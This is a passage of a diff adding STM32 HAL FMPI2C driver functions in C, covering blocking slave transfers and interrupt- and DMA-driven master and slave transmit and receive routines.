hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hfmpi2c->pBuffPtr = pData; + hfmpi2c->XferCount = Size; + hfmpi2c->XferISR = NULL; + + /* Send Slave Address */ + /* Set NBYTES to write and reload if hfmpi2c->XferCount > MAX_NBYTE_SIZE and generate RESTART */ + if (hfmpi2c->XferCount > MAX_NBYTE_SIZE) + { + hfmpi2c->XferSize = MAX_NBYTE_SIZE; + FMPI2C_TransferConfig(hfmpi2c, DevAddress, (uint8_t)hfmpi2c->XferSize, FMPI2C_RELOAD_MODE, + FMPI2C_GENERATE_START_READ); + } + else + { + hfmpi2c->XferSize = hfmpi2c->XferCount; + FMPI2C_TransferConfig(hfmpi2c, DevAddress, (uint8_t)hfmpi2c->XferSize, FMPI2C_AUTOEND_MODE, + FMPI2C_GENERATE_START_READ); + } + + while (hfmpi2c->XferCount > 0U) + { + /* Wait until RXNE flag is set */ + if (FMPI2C_WaitOnRXNEFlagUntilTimeout(hfmpi2c, Timeout, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + /* Read data from RXDR */ + *hfmpi2c->pBuffPtr = (uint8_t)hfmpi2c->Instance->RXDR; + + /* Increment Buffer pointer */ + hfmpi2c->pBuffPtr++; + + hfmpi2c->XferSize--; + hfmpi2c->XferCount--; + + if ((hfmpi2c->XferCount != 0U) && (hfmpi2c->XferSize == 0U)) + { + /* Wait until TCR flag is set */ + if (FMPI2C_WaitOnFlagUntilTimeout(hfmpi2c, FMPI2C_FLAG_TCR, RESET, Timeout, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + if (hfmpi2c->XferCount > MAX_NBYTE_SIZE) + { + hfmpi2c->XferSize = MAX_NBYTE_SIZE; + FMPI2C_TransferConfig(hfmpi2c, DevAddress, (uint8_t)hfmpi2c->XferSize, FMPI2C_RELOAD_MODE, + FMPI2C_NO_STARTSTOP); + } + else + { + hfmpi2c->XferSize = hfmpi2c->XferCount; + FMPI2C_TransferConfig(hfmpi2c, DevAddress, (uint8_t)hfmpi2c->XferSize, FMPI2C_AUTOEND_MODE, + FMPI2C_NO_STARTSTOP); + } + } + } + + /* No need to Check TC flag, with AUTOEND mode the stop is automatically generated */ + /* Wait until STOPF flag is set */ + if (FMPI2C_WaitOnSTOPFlagUntilTimeout(hfmpi2c, Timeout, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + /* Clear STOP Flag */ + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_STOPF); + + /* Clear Configuration Register 2 */ + FMPI2C_RESET_CR2(hfmpi2c); + + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Transmits in slave mode an amount of data in blocking mode. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @param Timeout Timeout duration + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPI2C_Slave_Transmit(FMPI2C_HandleTypeDef *hfmpi2c, uint8_t *pData, uint16_t Size, + uint32_t Timeout) +{ + uint32_t tickstart; + + if (hfmpi2c->State == HAL_FMPI2C_STATE_READY) + { + if ((pData == NULL) || (Size == 0U)) + { + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_INVALID_PARAM; + return HAL_ERROR; + } + /* Process Locked */ + __HAL_LOCK(hfmpi2c); + + /* Init tickstart for timeout management*/ + tickstart = HAL_GetTick(); + + hfmpi2c->State = HAL_FMPI2C_STATE_BUSY_TX; + hfmpi2c->Mode = HAL_FMPI2C_MODE_SLAVE; + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hfmpi2c->pBuffPtr = pData; + hfmpi2c->XferCount = Size; + hfmpi2c->XferISR = NULL; + + /* Enable Address Acknowledge */ + hfmpi2c->Instance->CR2 &= ~FMPI2C_CR2_NACK; + + /* Wait until ADDR flag is set */ + if (FMPI2C_WaitOnFlagUntilTimeout(hfmpi2c, FMPI2C_FLAG_ADDR, RESET, Timeout, tickstart) != HAL_OK) + { + /* Disable Address Acknowledge */ + hfmpi2c->Instance->CR2 |= FMPI2C_CR2_NACK; + return HAL_ERROR; + } + + /* Clear ADDR flag */ + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_ADDR); + + /* If 10bit addressing mode is selected */ + if (hfmpi2c->Init.AddressingMode == FMPI2C_ADDRESSINGMODE_10BIT) + { + /* Wait until ADDR flag is set */ + if (FMPI2C_WaitOnFlagUntilTimeout(hfmpi2c, FMPI2C_FLAG_ADDR, RESET, Timeout, tickstart) != HAL_OK) + { + /* Disable Address Acknowledge */ + hfmpi2c->Instance->CR2 |= FMPI2C_CR2_NACK; + return HAL_ERROR; + } + + /* Clear ADDR flag */ + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_ADDR); + } + + /* Wait until DIR flag is set Transmitter mode */ + if (FMPI2C_WaitOnFlagUntilTimeout(hfmpi2c, FMPI2C_FLAG_DIR, RESET, Timeout, tickstart) != HAL_OK) + { + /* Disable Address Acknowledge */ + hfmpi2c->Instance->CR2 |= FMPI2C_CR2_NACK; + return HAL_ERROR; + } + + while (hfmpi2c->XferCount > 0U) + { + /* Wait until TXIS flag is set */ + if (FMPI2C_WaitOnTXISFlagUntilTimeout(hfmpi2c, Timeout, tickstart) != HAL_OK) + { + /* Disable Address Acknowledge */ + hfmpi2c->Instance->CR2 |= FMPI2C_CR2_NACK; + return HAL_ERROR; + } + + /* Write data to TXDR */ + hfmpi2c->Instance->TXDR = *hfmpi2c->pBuffPtr; + + /* Increment Buffer pointer */ + hfmpi2c->pBuffPtr++; + + hfmpi2c->XferCount--; + } + + /* Wait until STOP flag is set */ + if (FMPI2C_WaitOnSTOPFlagUntilTimeout(hfmpi2c, Timeout, tickstart) != HAL_OK) + { + /* Disable Address Acknowledge */ + hfmpi2c->Instance->CR2 |= FMPI2C_CR2_NACK; + + if (hfmpi2c->ErrorCode == HAL_FMPI2C_ERROR_AF) + { + /* Normal use case for Transmitter mode */ + /* A NACK is generated to confirm the end of transfer */ + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_NONE; + } + else + { + return HAL_ERROR; + } + } + + /* Clear STOP flag */ + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_STOPF); + + /* Wait until BUSY flag is reset */ + if (FMPI2C_WaitOnFlagUntilTimeout(hfmpi2c, FMPI2C_FLAG_BUSY, SET, Timeout, tickstart) != HAL_OK) + { + /* Disable Address Acknowledge */ + hfmpi2c->Instance->CR2 |= FMPI2C_CR2_NACK; + return HAL_ERROR; + } + + /* Disable Address Acknowledge */ + hfmpi2c->Instance->CR2 |= FMPI2C_CR2_NACK; + + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Receive in slave mode an amount of data in blocking mode + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @param Timeout Timeout duration + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPI2C_Slave_Receive(FMPI2C_HandleTypeDef *hfmpi2c, uint8_t *pData, uint16_t Size, + uint32_t Timeout) +{ + uint32_t tickstart; + + if (hfmpi2c->State == HAL_FMPI2C_STATE_READY) + { + if ((pData == NULL) || (Size == 0U)) + { + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_INVALID_PARAM; + return HAL_ERROR; + } + /* Process Locked */ + __HAL_LOCK(hfmpi2c); + + /* Init tickstart for timeout management*/ + tickstart = HAL_GetTick(); + + hfmpi2c->State = HAL_FMPI2C_STATE_BUSY_RX; + hfmpi2c->Mode = HAL_FMPI2C_MODE_SLAVE; + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hfmpi2c->pBuffPtr = pData; + hfmpi2c->XferCount = Size; + hfmpi2c->XferISR = NULL; + + /* Enable Address Acknowledge */ + hfmpi2c->Instance->CR2 &= ~FMPI2C_CR2_NACK; + + /* Wait until ADDR flag is set */ + if (FMPI2C_WaitOnFlagUntilTimeout(hfmpi2c, FMPI2C_FLAG_ADDR, RESET, Timeout, tickstart) != HAL_OK) + { + /* Disable Address Acknowledge */ + hfmpi2c->Instance->CR2 |= FMPI2C_CR2_NACK; + return HAL_ERROR; + } + + /* Clear ADDR flag */ + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_ADDR); + + /* Wait until DIR flag is reset Receiver mode */ + if (FMPI2C_WaitOnFlagUntilTimeout(hfmpi2c, FMPI2C_FLAG_DIR, SET, Timeout, tickstart) != HAL_OK) + { + /* Disable Address Acknowledge */ + hfmpi2c->Instance->CR2 |= FMPI2C_CR2_NACK; + return HAL_ERROR; + } + + while (hfmpi2c->XferCount > 0U) + { + /* Wait until RXNE flag is set */ + if (FMPI2C_WaitOnRXNEFlagUntilTimeout(hfmpi2c, Timeout, tickstart) != HAL_OK) + { + /* Disable Address Acknowledge */ + hfmpi2c->Instance->CR2 |= FMPI2C_CR2_NACK; + + /* Store Last receive data if any */ + if (__HAL_FMPI2C_GET_FLAG(hfmpi2c, FMPI2C_FLAG_RXNE) == SET) + { + /* Read data from RXDR */ + *hfmpi2c->pBuffPtr = (uint8_t)hfmpi2c->Instance->RXDR; + + /* Increment Buffer pointer */ + hfmpi2c->pBuffPtr++; + + hfmpi2c->XferCount--; + } + + return HAL_ERROR; + } + + /* Read data from RXDR */ + *hfmpi2c->pBuffPtr = (uint8_t)hfmpi2c->Instance->RXDR; + + /* Increment Buffer pointer */ + hfmpi2c->pBuffPtr++; + + hfmpi2c->XferCount--; + } + + /* Wait until STOP flag is set */ + if (FMPI2C_WaitOnSTOPFlagUntilTimeout(hfmpi2c, Timeout, tickstart) != HAL_OK) + { + /* Disable Address Acknowledge */ + hfmpi2c->Instance->CR2 |= FMPI2C_CR2_NACK; + return HAL_ERROR; + } + + /* Clear STOP flag */ + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_STOPF); + + /* Wait until BUSY flag is reset */ + if (FMPI2C_WaitOnFlagUntilTimeout(hfmpi2c, FMPI2C_FLAG_BUSY, SET, Timeout, tickstart) != HAL_OK) + { + /* Disable Address Acknowledge */ + hfmpi2c->Instance->CR2 |= FMPI2C_CR2_NACK; + return HAL_ERROR; + } + + /* Disable Address Acknowledge */ + hfmpi2c->Instance->CR2 |= FMPI2C_CR2_NACK; + + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Transmit in master mode an amount of data in non-blocking mode with Interrupt + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPI2C_Master_Transmit_IT(FMPI2C_HandleTypeDef *hfmpi2c, uint16_t DevAddress, uint8_t *pData, + uint16_t Size) +{ + uint32_t xfermode; + + if (hfmpi2c->State == HAL_FMPI2C_STATE_READY) + { + if (__HAL_FMPI2C_GET_FLAG(hfmpi2c, FMPI2C_FLAG_BUSY) == SET) + { + return HAL_BUSY; + } + + /* Process Locked */ + __HAL_LOCK(hfmpi2c); + + hfmpi2c->State = HAL_FMPI2C_STATE_BUSY_TX; + hfmpi2c->Mode = HAL_FMPI2C_MODE_MASTER; + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hfmpi2c->pBuffPtr = pData; + hfmpi2c->XferCount = Size; + hfmpi2c->XferOptions = FMPI2C_NO_OPTION_FRAME; + hfmpi2c->XferISR = FMPI2C_Master_ISR_IT; + + if (hfmpi2c->XferCount > MAX_NBYTE_SIZE) + { + hfmpi2c->XferSize = MAX_NBYTE_SIZE; + xfermode = FMPI2C_RELOAD_MODE; + } + else + { + hfmpi2c->XferSize = hfmpi2c->XferCount; + xfermode = FMPI2C_AUTOEND_MODE; + } + + /* Send Slave Address */ + /* Set NBYTES to write and reload if hfmpi2c->XferCount > MAX_NBYTE_SIZE */ + FMPI2C_TransferConfig(hfmpi2c, DevAddress, (uint8_t)hfmpi2c->XferSize, xfermode, FMPI2C_GENERATE_START_WRITE); + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Note : The FMPI2C interrupts must be enabled after unlocking current process + to avoid the risk of FMPI2C interrupt handle execution before current + process unlock */ + + /* Enable ERR, TC, STOP, NACK, TXI interrupt */ + /* possible to enable all of these */ + /* FMPI2C_IT_ERRI | FMPI2C_IT_TCI | FMPI2C_IT_STOPI | FMPI2C_IT_NACKI | + FMPI2C_IT_ADDRI | FMPI2C_IT_RXI | FMPI2C_IT_TXI */ + FMPI2C_Enable_IRQ(hfmpi2c, FMPI2C_XFER_TX_IT); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Receive in master mode an amount of data in non-blocking mode with Interrupt + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPI2C_Master_Receive_IT(FMPI2C_HandleTypeDef *hfmpi2c, uint16_t DevAddress, uint8_t *pData, + uint16_t Size) +{ + uint32_t xfermode; + + if (hfmpi2c->State == HAL_FMPI2C_STATE_READY) + { + if (__HAL_FMPI2C_GET_FLAG(hfmpi2c, FMPI2C_FLAG_BUSY) == SET) + { + return HAL_BUSY; + } + + /* Process Locked */ + __HAL_LOCK(hfmpi2c); + + hfmpi2c->State = HAL_FMPI2C_STATE_BUSY_RX; + hfmpi2c->Mode = HAL_FMPI2C_MODE_MASTER; + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hfmpi2c->pBuffPtr = pData; + hfmpi2c->XferCount = Size; + hfmpi2c->XferOptions = FMPI2C_NO_OPTION_FRAME; + hfmpi2c->XferISR = FMPI2C_Master_ISR_IT; + + if (hfmpi2c->XferCount > MAX_NBYTE_SIZE) + { + hfmpi2c->XferSize = MAX_NBYTE_SIZE; + xfermode = FMPI2C_RELOAD_MODE; + } + else + { + hfmpi2c->XferSize = hfmpi2c->XferCount; + xfermode = FMPI2C_AUTOEND_MODE; + } + + /* Send Slave Address */ + /* Set NBYTES to write and reload if hfmpi2c->XferCount > MAX_NBYTE_SIZE */ + FMPI2C_TransferConfig(hfmpi2c, DevAddress, (uint8_t)hfmpi2c->XferSize, xfermode, FMPI2C_GENERATE_START_READ); + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Note : The FMPI2C interrupts must be enabled after unlocking current process + to avoid the risk of FMPI2C interrupt handle execution before current + process unlock */ + + /* Enable ERR, TC, STOP, NACK, RXI interrupt */ + /* possible to enable all of these */ + /* FMPI2C_IT_ERRI | FMPI2C_IT_TCI | FMPI2C_IT_STOPI | FMPI2C_IT_NACKI | + FMPI2C_IT_ADDRI | FMPI2C_IT_RXI | FMPI2C_IT_TXI */ + FMPI2C_Enable_IRQ(hfmpi2c, FMPI2C_XFER_RX_IT); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Transmit in slave mode an amount of data in non-blocking mode with Interrupt + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPI2C_Slave_Transmit_IT(FMPI2C_HandleTypeDef *hfmpi2c, uint8_t *pData, uint16_t Size) +{ + if (hfmpi2c->State == HAL_FMPI2C_STATE_READY) + { + /* Process Locked */ + __HAL_LOCK(hfmpi2c); + + hfmpi2c->State = HAL_FMPI2C_STATE_BUSY_TX; + hfmpi2c->Mode = HAL_FMPI2C_MODE_SLAVE; + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_NONE; + + /* Enable Address Acknowledge */ + hfmpi2c->Instance->CR2 &= ~FMPI2C_CR2_NACK; + + /* Prepare transfer parameters */ + hfmpi2c->pBuffPtr = pData; + hfmpi2c->XferCount = Size; + hfmpi2c->XferSize = hfmpi2c->XferCount; + hfmpi2c->XferOptions = FMPI2C_NO_OPTION_FRAME; + hfmpi2c->XferISR = FMPI2C_Slave_ISR_IT; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Note : The FMPI2C interrupts must be enabled after unlocking current process + to avoid the risk of FMPI2C interrupt handle execution before current + process unlock */ + + /* Enable ERR, TC, STOP, NACK, TXI interrupt */ + /* possible to enable all of these */ + /* FMPI2C_IT_ERRI | FMPI2C_IT_TCI | FMPI2C_IT_STOPI | FMPI2C_IT_NACKI | + FMPI2C_IT_ADDRI | FMPI2C_IT_RXI | FMPI2C_IT_TXI */ + FMPI2C_Enable_IRQ(hfmpi2c, FMPI2C_XFER_TX_IT | FMPI2C_XFER_LISTEN_IT); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Receive in slave mode an amount of data in non-blocking mode with Interrupt + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPI2C_Slave_Receive_IT(FMPI2C_HandleTypeDef *hfmpi2c, uint8_t *pData, uint16_t Size) +{ + if (hfmpi2c->State == HAL_FMPI2C_STATE_READY) + { + /* Process Locked */ + __HAL_LOCK(hfmpi2c); + + hfmpi2c->State = HAL_FMPI2C_STATE_BUSY_RX; + hfmpi2c->Mode = HAL_FMPI2C_MODE_SLAVE; + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_NONE; + + /* Enable Address Acknowledge */ + hfmpi2c->Instance->CR2 &= ~FMPI2C_CR2_NACK; + + /* Prepare transfer parameters */ + hfmpi2c->pBuffPtr = pData; + hfmpi2c->XferCount = Size; + hfmpi2c->XferSize = hfmpi2c->XferCount; + hfmpi2c->XferOptions = FMPI2C_NO_OPTION_FRAME; + hfmpi2c->XferISR = FMPI2C_Slave_ISR_IT; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Note : The FMPI2C interrupts must be enabled after unlocking current process + to avoid the risk of FMPI2C interrupt handle execution before current + process unlock */ + + /* Enable ERR, TC, STOP, NACK, RXI interrupt */ + /* possible to enable all of these */ + /* FMPI2C_IT_ERRI | FMPI2C_IT_TCI | FMPI2C_IT_STOPI | FMPI2C_IT_NACKI | + FMPI2C_IT_ADDRI | FMPI2C_IT_RXI | FMPI2C_IT_TXI */ + FMPI2C_Enable_IRQ(hfmpi2c, FMPI2C_XFER_RX_IT | FMPI2C_XFER_LISTEN_IT); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Transmit in master mode an amount of data in non-blocking mode with DMA + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPI2C_Master_Transmit_DMA(FMPI2C_HandleTypeDef *hfmpi2c, uint16_t DevAddress, uint8_t *pData, + uint16_t Size) +{ + uint32_t xfermode; + HAL_StatusTypeDef dmaxferstatus; + + if (hfmpi2c->State == HAL_FMPI2C_STATE_READY) + { + if (__HAL_FMPI2C_GET_FLAG(hfmpi2c, FMPI2C_FLAG_BUSY) == SET) + { + return HAL_BUSY; + } + + /* Process Locked */ + __HAL_LOCK(hfmpi2c); + + hfmpi2c->State = HAL_FMPI2C_STATE_BUSY_TX; + hfmpi2c->Mode = HAL_FMPI2C_MODE_MASTER; + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hfmpi2c->pBuffPtr = pData; + hfmpi2c->XferCount = Size; + hfmpi2c->XferOptions = FMPI2C_NO_OPTION_FRAME; + hfmpi2c->XferISR = FMPI2C_Master_ISR_DMA; + + if (hfmpi2c->XferCount > MAX_NBYTE_SIZE) + { + hfmpi2c->XferSize = MAX_NBYTE_SIZE; + xfermode = FMPI2C_RELOAD_MODE; + } + else + { + hfmpi2c->XferSize = hfmpi2c->XferCount; + xfermode = FMPI2C_AUTOEND_MODE; + } + + if (hfmpi2c->XferSize > 0U) + { + if (hfmpi2c->hdmatx != NULL) + { + /* Set the FMPI2C DMA transfer complete callback */ + hfmpi2c->hdmatx->XferCpltCallback = FMPI2C_DMAMasterTransmitCplt; + + /* Set the DMA error callback */ + hfmpi2c->hdmatx->XferErrorCallback = FMPI2C_DMAError; + + /* Set the unused DMA callbacks to NULL */ + hfmpi2c->hdmatx->XferHalfCpltCallback = NULL; + hfmpi2c->hdmatx->XferAbortCallback = NULL; + + /* Enable the DMA stream */ + dmaxferstatus = HAL_DMA_Start_IT(hfmpi2c->hdmatx, (uint32_t)pData, (uint32_t)&hfmpi2c->Instance->TXDR, + hfmpi2c->XferSize); + } + else + { + /* Update FMPI2C state */ + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* Update FMPI2C error code */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_DMA_PARAM; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_ERROR; + } + + if (dmaxferstatus == HAL_OK) + { + /* Send Slave Address */ + /* Set NBYTES to write and reload if hfmpi2c->XferCount > MAX_NBYTE_SIZE and generate RESTART */ + FMPI2C_TransferConfig(hfmpi2c, DevAddress, (uint8_t)hfmpi2c->XferSize, xfermode, FMPI2C_GENERATE_START_WRITE); + + /* Update XferCount value */ + hfmpi2c->XferCount -= hfmpi2c->XferSize; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Note : The FMPI2C interrupts must be enabled after unlocking current process + to avoid the risk of FMPI2C interrupt handle execution before current + process unlock */ + /* Enable ERR and NACK interrupts */ + FMPI2C_Enable_IRQ(hfmpi2c, FMPI2C_XFER_ERROR_IT); + + /* Enable DMA Request */ + hfmpi2c->Instance->CR1 |= FMPI2C_CR1_TXDMAEN; + } + else + { + /* Update FMPI2C state */ + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* Update FMPI2C error code */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_DMA; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_ERROR; + } + } + else + { + /* Update Transfer ISR function pointer */ + hfmpi2c->XferISR = FMPI2C_Master_ISR_IT; + + /* Send Slave Address */ + /* Set NBYTES to write and generate START condition */ + FMPI2C_TransferConfig(hfmpi2c, DevAddress, (uint8_t)hfmpi2c->XferSize, FMPI2C_AUTOEND_MODE, + FMPI2C_GENERATE_START_WRITE); + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Note : The FMPI2C interrupts must be enabled after unlocking current process + to avoid the risk of FMPI2C interrupt handle execution before current + process unlock */ + /* Enable ERR, TC, STOP, NACK, TXI interrupt */ + /* possible to enable all of these */ + /* FMPI2C_IT_ERRI | FMPI2C_IT_TCI | FMPI2C_IT_STOPI | FMPI2C_IT_NACKI | + FMPI2C_IT_ADDRI | FMPI2C_IT_RXI | FMPI2C_IT_TXI */ + FMPI2C_Enable_IRQ(hfmpi2c, FMPI2C_XFER_TX_IT); + } + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Receive in master mode an amount of data in non-blocking mode with DMA + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPI2C_Master_Receive_DMA(FMPI2C_HandleTypeDef *hfmpi2c, uint16_t DevAddress, uint8_t *pData, + uint16_t Size) +{ + uint32_t xfermode; + HAL_StatusTypeDef dmaxferstatus; + + if (hfmpi2c->State == HAL_FMPI2C_STATE_READY) + { + if (__HAL_FMPI2C_GET_FLAG(hfmpi2c, FMPI2C_FLAG_BUSY) == SET) + { + return HAL_BUSY; + } + + /* Process Locked */ + __HAL_LOCK(hfmpi2c); + + hfmpi2c->State = HAL_FMPI2C_STATE_BUSY_RX; + hfmpi2c->Mode = HAL_FMPI2C_MODE_MASTER; + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hfmpi2c->pBuffPtr = pData; + hfmpi2c->XferCount = Size; + hfmpi2c->XferOptions = FMPI2C_NO_OPTION_FRAME; + hfmpi2c->XferISR = FMPI2C_Master_ISR_DMA; + + if (hfmpi2c->XferCount > MAX_NBYTE_SIZE) + { + hfmpi2c->XferSize = MAX_NBYTE_SIZE; + xfermode = FMPI2C_RELOAD_MODE; + } + else + { + hfmpi2c->XferSize = hfmpi2c->XferCount; + xfermode = FMPI2C_AUTOEND_MODE; + } + + if (hfmpi2c->XferSize > 0U) + { + if (hfmpi2c->hdmarx != NULL) + { + /* Set the FMPI2C DMA transfer complete callback */ + hfmpi2c->hdmarx->XferCpltCallback = FMPI2C_DMAMasterReceiveCplt; + + /* Set the DMA error callback */ + hfmpi2c->hdmarx->XferErrorCallback = FMPI2C_DMAError; + + /* Set the unused DMA callbacks to NULL */ + hfmpi2c->hdmarx->XferHalfCpltCallback = NULL; + hfmpi2c->hdmarx->XferAbortCallback = NULL; + + /* Enable the DMA stream */ + dmaxferstatus = HAL_DMA_Start_IT(hfmpi2c->hdmarx, (uint32_t)&hfmpi2c->Instance->RXDR, (uint32_t)pData, + hfmpi2c->XferSize); + } + else + { + /* Update FMPI2C state */ + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* Update FMPI2C error code */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_DMA_PARAM; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_ERROR; + } + + if (dmaxferstatus == HAL_OK) + { + /* Send Slave Address */ + /* Set NBYTES to read and reload if hfmpi2c->XferCount > MAX_NBYTE_SIZE and generate RESTART */ + FMPI2C_TransferConfig(hfmpi2c, DevAddress, (uint8_t)hfmpi2c->XferSize, xfermode, FMPI2C_GENERATE_START_READ); + + /* Update XferCount value */ + hfmpi2c->XferCount -= hfmpi2c->XferSize; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Note : The FMPI2C interrupts must be enabled after unlocking current process + to avoid the risk of FMPI2C interrupt handle execution before current + process unlock */ + /* Enable ERR and NACK interrupts */ + FMPI2C_Enable_IRQ(hfmpi2c, FMPI2C_XFER_ERROR_IT); + + /* Enable DMA Request */ + hfmpi2c->Instance->CR1 |= FMPI2C_CR1_RXDMAEN; + } + else + { + /* Update FMPI2C state */ + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* Update FMPI2C error code */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_DMA; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_ERROR; + } + } + else + { + /* Update Transfer ISR function pointer */ + hfmpi2c->XferISR = FMPI2C_Master_ISR_IT; + + /* Send Slave Address */ + /* Set NBYTES to read and generate START condition */ + FMPI2C_TransferConfig(hfmpi2c, DevAddress, (uint8_t)hfmpi2c->XferSize, FMPI2C_AUTOEND_MODE, + FMPI2C_GENERATE_START_READ); + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Note : The FMPI2C interrupts must be enabled after unlocking current process + to avoid the risk of FMPI2C interrupt handle execution before current + process unlock */ + /* Enable ERR, TC, STOP, NACK, TXI interrupt */ + /* possible to enable all of these */ + /* FMPI2C_IT_ERRI | FMPI2C_IT_TCI | FMPI2C_IT_STOPI | FMPI2C_IT_NACKI | + FMPI2C_IT_ADDRI | FMPI2C_IT_RXI | FMPI2C_IT_TXI */ + FMPI2C_Enable_IRQ(hfmpi2c, FMPI2C_XFER_TX_IT); + } + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Transmit in slave mode an amount of data in non-blocking mode with DMA + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @retval HAL status + */ +HAL_StatusTypeDef 